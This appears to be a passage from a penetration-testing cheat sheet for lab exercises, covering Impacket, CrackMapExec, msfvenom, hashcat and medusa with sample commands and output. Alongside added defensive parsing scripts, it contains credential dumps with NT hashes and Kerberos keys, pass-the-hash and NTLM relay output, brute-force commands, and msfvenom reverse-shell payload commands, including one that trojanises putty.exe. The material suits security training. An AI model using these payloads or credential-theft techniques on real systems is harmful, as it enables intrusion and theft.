    [*] $MACHINE.ACC     $MACHINE.ACC:plain_password_hex:cd3557a805cd9dc8973cba946045b4c210ffa62c68bd294b747ad49b7bb4eb740100de6d03527b7e49cf05c99376a7c9087980ed601edae0ee8106360ff097f28d6f27139d75826fbcd9aae542582a7cbfe1a95bd68d372859dffad6320e648abc558038cc826d4ecdbff03f3ddebafe9b887511c977ec1da0e02b9e5e560502b635ac4c9243d55259de10cb58147cbca325ba5c678082562ed8098e92adc89d4cc19d0fffa069156e938a44c43c2f576be27d35e719dfe2960abad4b1844e0dcc4cd47cc710727f42ede02d12a4db5349156c13aa804a65b5ae75f339ddb29faee327c674c5945717e50cdc216a1fb0
    $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:a8700dec959b069eec78964e18f27da8
    [*] DPAPI_SYSTEM 
    dpapi_machinekey:0x0e88ce11d311d3966ca2422ac2708a4d707e00be
    dpapi_userkey:0x8b68be9ef724e59070e7e3559e10078e36e8ab32
    [*] NL$KM 
     0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
     0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
     0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
     0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
    NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Searching for pekList, be patient
    [*] PEK # 0 found and decrypted: 55db1e9562985070bbba0ef2cc25754c
    [*] Reading and decrypting hashes from ./Active Directory/ntds.dit 
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:a8700dec959b069eec78964e18f27da8:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
    thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
    thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
    [...]
    [*] Kerberos keys from ./Active Directory/ntds.dit 
    Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df8e921088e82b2da0955ed41e83d4c211031b99118bf30
    Administrator:aes128-cts-hmac-sha1-96:bab514a24ef3df25c182f5520bfc54a0
    Administrator:des-cbc-md5:6d34e608f8574632
    CREDS-HARVESTIN$:aes256-cts-hmac-sha1-96:5f85915d4ec0ee993d88c025533708c2eb44b79f43c28cb3a03708f63311c51a
    CREDS-HARVESTIN$:aes128-cts-hmac-sha1-96:6970d5c90fc88c455b61ac895e9119f6
    CREDS-HARVESTIN$:des-cbc-md5:20efa17cb373d337
    krbtgt:aes256-cts-hmac-sha1-96:24fad271ecff882bfce29d8464d84087c58e5db4083759e69d099ecb31573ad3
    krbtgt:aes128-cts-hmac-sha1-96:2feb0c1629b37163d59d4c0deb5ce64c
    krbtgt:des-cbc-md5:d92ffd4abf02b049
    thm.red\thm:aes256-cts-hmac-sha1-96:2a54bb9728201d8250789f5e793db4097630dcad82c93bcf9342cb8bf20443ca
    thm.red\thm:aes128-cts-hmac-sha1-96:70179d57a210f22ad094726be50f703c
    [...]
    [*] Cleaning up... 
    root@ip-10-10-150-52:~# 
    
    
    # Perform DC-Sync remotely - secretsdump.py
    
    Password:
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
    thm.red\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
    thm.red\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
    [...]
    [*] Cleaning up... 
    root@ip-10-10-150-52:~# 
    
    
    # Executing files over SMB from linux - smbexec.py
    
    [!] Launching semi-interactive shell - Careful what you execute
    C:\Windows\system32>
    
    Then launch shell:  c:\Users\Administrator\Desktop\shell.exe
    
    
    # Relay captured NTLM authentication to the -t target - ntlmrelayx.py
    
    [*] Protocol Client IMAPS loaded..
    [*] Protocol Client IMAP loaded..
    
    [*] Protocol Client RPC loaded..
    [*] Protocol Client DCSYNC loaded..
    [*] Protocol Client LDAP loaded..
    [*] Protocol Client LDAPS loaded..
    [*] Protocol Client SMB loaded..
    [*] Protocol Client HTTPS loaded..
    [*] Protocol Client HTTP loaded..
    [...]
    [*] Running in relay mode to single host
    [*] Setting up SMB Server
    [*] Setting up HTTP Server on port 80
    [*] Setting up RAW Server on port 6666
    [*] Servers started, waiting for connections
    [*] SMBD-Thread-5: Received connection from 10.200.72.202, attacking target smb://10.200.72.201
    [*] Authenticating against smb://10.200.72.201 as ZA/THMSERVER2$ SUCCEED
    [+] No more targets
    [*] SMBD-Thread-7: Connection from 10.200.72.202 controlled, but there are no more targets left!
    [+] No more targets
    [*] SMBD-Thread-8: Connection from 10.200.72.202 controlled, but there are no more targets left!
    [*] Service RemoteRegistry is in stopped state
    [...]
    [*] Target system bootKey: 0x4e05e7ea4fdddde75aa56010474948dc
    [+] Saving remote SAM database
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
    [+] Calculating HashedBootKey from SAM
    [+] NewStyle hashes is: True
    ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c:::
    [...]
    [*] Done dumping SAM hashes for host: 10.200.72.201
    [*] Stopping service RemoteRegistry
    
    
    # Pass-the-hash - psexec.py
    
    [*] Requesting shares on 10.10.203.243.....
    [*] Found writable share ADMIN$
    [*] Uploading file gYXGGCjx.exe
    [*] Opening SVCManager on 10.10.203.243.....
    [*] Creating service JsxB on 10.10.203.243.....
    [*] Starting service JsxB.....
    [!] Press help for extra shell commands
    Microsoft Windows [Version 10.0.17763.1821]
    (c) 2018 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32> whoami
    nt authority\system
    
    
    # Serving files - smbserver.py
    
    [*] Config file parsed
    [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    [*] Config file parsed
    [*] Config file parsed
    [*] Config file parsed
    [*] Incoming connection (10.10.203.243,49907)
    [*] AUTHENTICATE_MESSAGE (WPRIVESC2\THMBackup,WPRIVESC2)
    [*] User WPRIVESC2\THMBackup authenticated successfully
    [*]   THMBackup::WPRIVESC2:aaaaaaaaaaaaaaaa:3c80cd0ac47d4b4a7d45f34defbe663f:010100000000000000a053a5cd4cdc01a966444d2c989a690000000001001000530074005a0059006e0069005600710003001000530074005a0059006e0069005600710002001000460079006c00700066007a006c00690004001000460079006c00700066007a006c0069000700080000a053a5cd4cdc0106000400020000000800300030000000000000000000000000300000d6eac08cccf660286908c2e9b8cf391ab727daa14772f3cc23fad015f3db5d2b0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003200310038002e00380033000000000000000000
    [*] Connecting Share(1:IPC$)
    [*] Connecting Share(2:public)
    [*] Disconnecting Share(1:IPC$)
    [*] Disconnecting Share(2:public)
    [*] Closing down connection (10.10.203.243,49907)
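
Added example (my own code, not part of Impacket or of the original post): once secretsdump.py has produced the pwdump-style `user:rid:lmhash:nthash:::` lines shown above, the questions an auditor asks are which accounts have a blank password, which still store an LM hash, which share an NT hash with another account (password reuse, visible because NT hashes are unsalted) and which match a blocklist of known-weak hashes. The sample input takes the NTDS lines from the output above and adds two constructed accounts, svc_backup (reuses the Administrator NT hash) and legacy (still has an LM hash and a blocklisted password), so that every check fires; the blocklist holds the widely published LM/NT hash pair for the password "password".

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string: blank password

# One-entry blocklist: the well-known NT hash of the password "password".
NT_BLOCKLIST = {"8846f7eaee8fb117ad06bdd830b7586c": "password"}

# Lines from the NTDS dump above, plus two constructed accounts (svc_backup reuses the
# Administrator NT hash; legacy still has an LM hash and a blocklisted password).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CREDS-HARVESTIN$:1008:aad3b435b51404eeaad3b435b51404ee:a8700dec959b069eec78964e18f27da8:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ec44ddf5ae100b898e9edab74811430d:::
thm.red\\thm:1114:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
thm.red\\victim:1115:aad3b435b51404eeaad3b435b51404ee:6c3d8f78c69ff2ebc377e19e96a10207:::
thm.red\\svc_backup:1116:aad3b435b51404eeaad3b435b51404ee:fc9b72f354f0371219168bdb1460af32:::
thm.red\\legacy:1117:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Kerberos keys from ./Active Directory/ntds.dit
Administrator:aes256-cts-hmac-sha1-96:510e0d5515009dc29df8e921088e82b2da0955ed41e83d4c211031b99118bf30
[*] Cleaning up...
"""

# user:rid:lmhash:nthash::: as printed by secretsdump.py (pwdump format)
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Keep only the credential lines; status lines and Kerberos keys are skipped."""
    records = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            records.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def audit(records):
    """Password-hygiene findings an auditor reports from a dump."""
    findings = {"blank_password": [], "lm_hash_present": [], "weak_password": [],
                "privileged": [], "reuse": []}
    by_nt = defaultdict(list)
    for r in records:
        if r["user"].endswith("$"):
            continue                      # machine accounts: random passwords, not audited
        if r["nt"] == EMPTY_NT:           # built-in Guest is normally disabled; confirm anyway
            findings["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:           # LM hashes are trivially crackable; should be absent
            findings["lm_hash_present"].append(r["user"])
        if r["nt"] in NT_BLOCKLIST:
            findings["weak_password"].append((r["user"], NT_BLOCKLIST[r["nt"]]))
        if r["rid"] in (500, 502):        # built-in Administrator and krbtgt
            findings["privileged"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    # Identical NT hash means identical password (no salt), i.e. reuse across accounts
    findings["reuse"] = sorted(sorted(users) for nt, users in by_nt.items()
                               if len(users) > 1 and nt != EMPTY_NT)
    return findings


if __name__ == "__main__":
    for name, hits in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{name:17} {hits}")
```

The reuse check is the one that pays off most in practice: a service account sharing the built-in Administrator's NT hash is a finding even when neither password is crackable.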
    
    

9. CrackMapExec (CME)

  • Use Case: Mass auth, enumeration, and command execution across Windows domains. Github

  • Input Example:

    crackmapexec ssh 10.10.81.188 -u burgess -p 'Fall2021@'
    
    crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd'
    
    crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' --shares
    
    crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' -x 'whoami'
    
    crackmapexec smb 10.10.223.203 -u Administrator -p 'P@$$W0rd' --exec-method smbexec -x 'powershell -c "hostname"'
    
    crackmapexec ftp 10.10.144.205 -u ftp -p ftp --ls
    
                                                                Version : 6.1.0
                                                              Codename: John Wick
    
    options:
      -h, --help            show this help message and exit
      -t THREADS            set how many concurrent threads to use (default: 100)
      --timeout TIMEOUT     max timeout in seconds of each thread (default: None)
      --jitter INTERVAL     sets a random delay between each connection (default: None)
      --no-progress         Not displaying progress bar during scan
      --verbose             enable verbose output
      --debug               enable debug level information
      --version             Display CME version
    
    protocols:
      available protocols
    
      {ftp,ldap,mssql,rdp,smb,ssh,vnc,winrm,wmi}
        ftp                 own stuff using FTP
        ldap                own stuff using LDAP
        mssql               own stuff using MSSQL
        rdp                 own stuff using RDP
        smb                 own stuff using SMB
        ssh                 own stuff using SSH
        vnc                 own stuff using VNC
        winrm               own stuff using WINRM
        wmi                 own stuff using WMI
    
    
  • Output Example:

    SSH         10.10.81.188    22     10.10.81.188     [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.13
    SSH         10.10.81.188    22     10.10.81.188     [+] burgess:Fall2021@  - shell access!
    root@ip-10-10-169-75:~# 
    
    
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!)
    
    NOTE: (Pwn3d!) → CME detected that this account has administrative rights on the target (full compromise).
    
    
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Enumerated shares
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  Share           Permissions     Remark
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  -----           -----------     ------
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  ADMIN$          READ,WRITE      Remote Admin
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  C$              READ,WRITE      Default share
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  IPC$            READ            Remote IPC
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  NETLOGON        READ,WRITE      Logon server share 
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  Share           READ,WRITE      
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  SYSVOL          READ            Logon server share 
    
    
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] Executed command via wmiexec
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  controller\administrator
    
    NOTE: wmiexec is stealthier than the service-based methods because no service is created on the target
    
    
    
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] CONTROLLER.local\Administrator:P@$$W0rd (Pwn3d!)
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] Executed command via smbexec
    SMB         10.10.223.203   445    DOMAIN-CONTROLL  Domain-Controller
    
    NOTE: smbexec also creates a service (similar to PsExec) to execute commands
    
    
    FTP         10.10.144.205   21     10.10.144.205    [*] Banner: (vsFTPd 3.0.5)
    FTP         10.10.144.205   21     10.10.144.205    [+] ftp:ftp
    FTP         10.10.144.205   21     10.10.144.205    [*] Directory Listing
    FTP         10.10.144.205   21     10.10.144.205    drwxr-xr-x    2 111      116          4096 Oct 12  2021 files  
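
Added example (my own code, not from CrackMapExec or the original post): a small parser for the SMB banner and auth lines above that pulls out the (signing:...) and (SMBv1:...) fields and the (Pwn3d!) marker. The ntlmrelayx run in the Impacket section only succeeds against hosts that do not require SMB signing, so a defender reading CME output wants the list of hosts where signing is off (to enforce it) and where SMBv1 is still on (to disable it). The second host, 10.10.223.210 / FILESRV01, and its banner text are constructed so that both checks fire.

```python
import re

# Banner and auth lines as printed by crackmapexec's smb module above, plus a
# constructed second host (10.10.223.210 / FILESRV01) with signing off and SMBv1 on.
CME_OUTPUT = """\
SMB         10.10.223.203   445    DOMAIN-CONTROLL  [*] Windows 10.0 Build 17763 x64 (name:DOMAIN-CONTROLL) (domain:CONTROLLER.local) (signing:True) (SMBv1:False)
SMB         10.10.223.203   445    DOMAIN-CONTROLL  [+] CONTROLLER.local\\Administrator:P@$$W0rd (Pwn3d!)
SMB         10.10.223.210   445    FILESRV01        [*] Windows 6.3 Build 9600 x64 (name:FILESRV01) (domain:CONTROLLER.local) (signing:False) (SMBv1:True)
SMB         10.10.223.210   445    FILESRV01        [+] CONTROLLER.local\\Administrator:P@$$W0rd
"""

BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+\S+\s+\[\*\]\s+(?P<os>.+?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)
AUTH_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+\S+\s+\[\+\]\s+(?P<cred>\S+)(?P<pwned>\s+\(Pwn3d!\))?\s*$"
)


def parse_cme_smb(text):
    """Build one record per host from the banner ([*]) and auth ([+]) lines."""
    hosts = {}
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m:
            hosts[m["ip"]] = {
                "name": m["name"], "domain": m["domain"], "os": m["os"],
                "signing": m["signing"] == "True",
                "smbv1": m["smbv1"] == "True",
                "admin": False, "cred": None,
            }
            continue
        m = AUTH_RE.match(line)
        if m and m["ip"] in hosts:
            hosts[m["ip"]]["cred"] = m["cred"]
            hosts[m["ip"]]["admin"] = m["pwned"] is not None   # (Pwn3d!) = local admin
    return hosts


def signing_not_required(hosts):
    """Hosts that accept unsigned SMB sessions: enforce signing there first."""
    return sorted(ip for ip, h in hosts.items() if not h["signing"])


def smbv1_enabled(hosts):
    """Hosts still answering SMBv1, a finding on its own."""
    return sorted(ip for ip, h in hosts.items() if h["smbv1"])


def admin_access(hosts):
    """Hosts where CME printed (Pwn3d!), i.e. the tested credential is an admin there."""
    return sorted(ip for ip, h in hosts.items() if h["admin"])


if __name__ == "__main__":
    hosts = parse_cme_smb(CME_OUTPUT)
    for ip, h in hosts.items():
        print(f"{ip:15} {h['name']:16} signing={h['signing']} smbv1={h['smbv1']} admin={h['admin']}")
    print("signing not required:", signing_not_required(hosts))
    print("SMBv1 enabled:       ", smbv1_enabled(hosts))
    print("admin access:        ", admin_access(hosts))
```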
    
    

10. msfvenom

  • Use Case: Payload generation for Metasploit or standalone droppers. Github

  • Input Example:

    # Catch with metasploit handler
    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.4 LPORT=443 -f exe -o agent.exe
    
    # Catch with netcat
    msfvenom -p windows/shell_reverse_tcp lhost=10.10.74.154 lport=4444 -f exe -o payload.exe
    
    # Catch with metasploit handler
    msfvenom -p windows/shell/reverse_tcp lhost=10.10.74.154 lport=4444 -f exe -o payload.exe
    
    # Catch with netcat
    msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=10.10.50.56 lport=4444 -b "\x00" -f exe -o puttyX.exe
    
    ✅ Extra Notes
    
    -x putty.exe → Injects the payload into the original Putty executable (file binding).
    -k → Keeps the original functionality of Putty after infection.
    -b "\x00" → Avoids null bytes in the payload (important for stability).
    -f exe → Output format is Windows executable.
    

    ⚠️ Warning: Important notes on staged vs. stageless / un-staged

    ✅ If you want Netcat to catch the shell:
    Netcat only handles raw TCP streams, so you need to use a generic, un-staged reverse shell payload (windows/shell_reverse_tcp).
    
    ✅ If you want Metasploit to catch the shell:
    windows/shell/reverse_tcp is staged: the small first stage only connects back and expects the Metasploit handler to deliver the second stage, so a plain netcat listener cannot complete the connection.
    
    # Create a powershell payload
    msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1
    
  • Output Example:

    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 854 bytes
    Final size of exe file: 7168 bytes
    Saved as: agent.exe
    
    

11. hashcat

  • Use Case: Offline password cracking (hashes of many types). Github

  • Input Example:

    hashcat -a 0 -m 100 8d6e34f987851aa599257d3831a1af040886842f /usr/share/wordlists/rockyou.txt
    
    hashcat -a 3 -m 0 e48e13207341b6bffb7fb1622282247b ?d?d?d?d
    
    hashcat -a 0 -m 13100 tgs.hash /usr/share/wordlists/rockyou.txt
    
    # Hash intercepted by responder - NetNTLMv2 format
    
    hashcat -m 5600 $hash passwords.txt --force
    
    
    Attack Modes (-a):
    
    0 = Straight Dictionary Attack 
    Example: hashcat -m 500 -a 0 hash.txt dict.txt
    
    1 = Combination Attack 
    Example: hashcat -m 500 -a 1 hash.txt dict1.txt dict2.txt
    
    3 = Brute Force Attack 
    Example: hashcat -m 500 -a 3 hash.txt ?l?d?u
    
    6 = Hybrid Wordlist + Mask
    Example: hashcat -m 500 -a 6 hash.txt wordlist.txt ?d?s
    
    7 = Mask + Wordlist 
    Example: hashcat -m 500 -a 7 hash.txt ?d?s wordlist.txt
    
    
  • Output Example:

    
    [...]
    Dictionary cache built:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14344392
    * Bytes.....: 139921507
    * Keyspace..: 14344385
    * Runtime...: 2 secs
    
    8d6e34f987851aa599257d3831a1af040886842f:sunshine         
                                                            
    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 100 (SHA1)
    Hash.Target......: 8d6e34f987851aa599257d3831a1af040886842f
    Time.Started.....: Fri Nov  7 15:48:31 2025 (0 secs)
    Time.Estimated...: Fri Nov  7 15:48:31 2025 (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:     8730 H/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
    Progress.........: 512/14344385 (0.00%)
    Rejected.........: 0/512 (0.00%)
    Restore.Point....: 0/14344385 (0.00%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidate.Engine.: Device Generator
    Candidates.#1....: 123456 -> letmein
    
    Started: Fri Nov  7 15:47:46 2025
    Stopped: Fri Nov  7 15:48:32 2025
    
    
    
    [...]
    e48e13207341b6bffb7fb1622282247b:1337                     
                                                            
    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 0 (MD5)
    Hash.Target......: e48e13207341b6bffb7fb1622282247b
    Time.Started.....: Fri Nov  7 16:13:28 2025 (0 secs)
    Time.Estimated...: Fri Nov  7 16:13:28 2025 (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Mask.......: ?d?d?d?d [4]
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:    64306 H/s (0.15ms) @ Accel:256 Loops:10 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
    Progress.........: 10000/10000 (100.00%)
    Rejected.........: 0/10000 (0.00%)
    Restore.Point....: 512/1000 (51.20%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-10 Iteration:0-10
    Candidate.Engine.: Device Generator
    Candidates.#1....: 1813 -> 6764
    
    Started: Fri Nov  7 16:13:08 2025
    Stopped: Fri Nov  7 16:13:30 2025
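
Added example (my own code, not from hashcat or the original post): the keyspace arithmetic behind the attack modes listed in the hashcat input section, plus a minimal mask walker that reproduces what the `-a 3 -m 0 ... ?d?d?d?d` run above does. A four-digit mask is 10^4 candidates, which is exactly the Progress 10000/10000 line in that output; the rockyou.txt keyspace figure (14344385) is the one the dictionary-cache output above reports. Charset sizes follow hashcat's documented built-ins (?l 26, ?u 26, ?d 10, ?s 33, ?a 95, ?h/?H 16); mode 6/7 keyspace is the wordlist line count times the mask keyspace, and mode 1 is the product of the two dictionary sizes. The walker is lexicographic rather than hashcat's base/amplifier split, so candidate order differs from the Candidates.#1 line.

```python
import hashlib
import itertools
import string

# hashcat's built-in charsets; sizes: ?l=26 ?u=26 ?d=10 ?s=33 ?a=95 ?h=?H=16
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,     # 33 printable specials, space included
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def expand_mask(mask):
    """Turn a mask such as '?d?d?d?d' or 'Summer?d?d?s' into one charset per position."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            token = mask[i + 1]
            if token == "?":
                positions.append("?")           # '??' is a literal question mark
            elif token in CHARSETS:
                positions.append(CHARSETS[token])
            else:
                raise ValueError(f"unknown charset ?{token}")
            i += 2
        else:
            positions.append(mask[i])           # any other character is literal
            i += 1
    return positions


def mask_keyspace(mask):
    """Number of candidates a -a 3 run over this mask produces."""
    n = 1
    for charset in expand_mask(mask):
        n *= len(charset)
    return n


def attack_keyspace(mode, wordlists=(), mask=None):
    """Candidate count for a hashcat -a mode; wordlist sizes are line counts."""
    if mode == 0:                  # straight: one candidate per wordlist line
        return wordlists[0]
    if mode == 1:                  # combination: every left word joined with every right word
        return wordlists[0] * wordlists[1]
    if mode == 3:                  # brute force over the mask
        return mask_keyspace(mask)
    if mode in (6, 7):             # hybrid: wordlist x mask, appended (6) or prepended (7)
        return wordlists[0] * mask_keyspace(mask)
    raise ValueError(f"unsupported attack mode {mode}")


def digest(text, algo="md5"):
    """Hex digest of a candidate with the named hashlib algorithm (md5 = hashcat -m 0)."""
    return hashlib.new(algo, text.encode()).hexdigest()


def crack_mask(digest_hex, mask, algo="md5", limit=1_000_000):
    """Walk the mask keyspace in lexicographic order; return the matching candidate or None."""
    if mask_keyspace(mask) > limit:
        raise ValueError("keyspace too large for this toy walker")
    target = digest_hex.lower()
    for combo in itertools.product(*expand_mask(mask)):
        candidate = "".join(combo)
        if digest(candidate, algo) == target:
            return candidate
    return None


if __name__ == "__main__":
    for example in ("?d?d?d?d", "?l?d?u", "?d?s", "?a?a?a?a?a?a?a?a"):
        print(f"{example:20} {mask_keyspace(example):,} candidates")
    rockyou = 14344385                             # keyspace reported for rockyou.txt above
    print(f"-a 6 rockyou.txt ?d?s: {attack_keyspace(6, (rockyou,), '?d?s'):,}")
    # The -m 0 -a 3 run above: 10,000 candidates, the Progress 10000/10000 line
    print(crack_mask("e48e13207341b6bffb7fb1622282247b", "?d?d?d?d"))
```

The eight-character ?a line in the output is the point of the exercise: 95^8 is about 6.6 x 10^15 candidates, which is why full brute force is reserved for short or well-structured passwords and wordlist-based modes come first.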
    
    

12. medusa

  • Use Case: Parallelized online brute forcing; an alternative to Hydra, although less flexible than Hydra for HTTP form brute forcing (only basic, digest and NTLM authentication are supported). Github

  • Input Example:

    medusa -h 10.10.144.205 -u ftp -p ftp -M ftp
    
    medusa -h 10.10.81.19 -U usernames-list.txt -P seasons-exp.txt -M ssh -t 5
    
    medusa -d
    
    
    Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
      + cvs.mod : Brute force module for CVS sessions : version 2.0
      + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
      + http.mod : Brute force module for HTTP : version 2.1
      + imap.mod : Brute force module for IMAP sessions : version 2.0
      + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
      + mysql.mod : Brute force module for MySQL sessions : version 2.0
      + nntp.mod : Brute force module for NNTP sessions : version 2.0
      + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
      + pop3.mod : Brute force module for POP3 sessions : version 2.0
      + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
      + rexec.mod : Brute force module for REXEC sessions : version 2.0
      + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
      + rsh.mod : Brute force module for RSH sessions : version 2.0
      + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
      + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
      + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
      + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
      + ssh.mod : Brute force module for SSH v2 sessions : version 2.1
      + svn.mod : Brute force module for Subversion sessions : version 2.1
      + telnet.mod : Brute force module for telnet sessions : version 2.0
      + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
      + vnc.mod : Brute force module for VNC sessions : version 2.1
      + web-form.mod : Brute force module for web forms : version 2.1
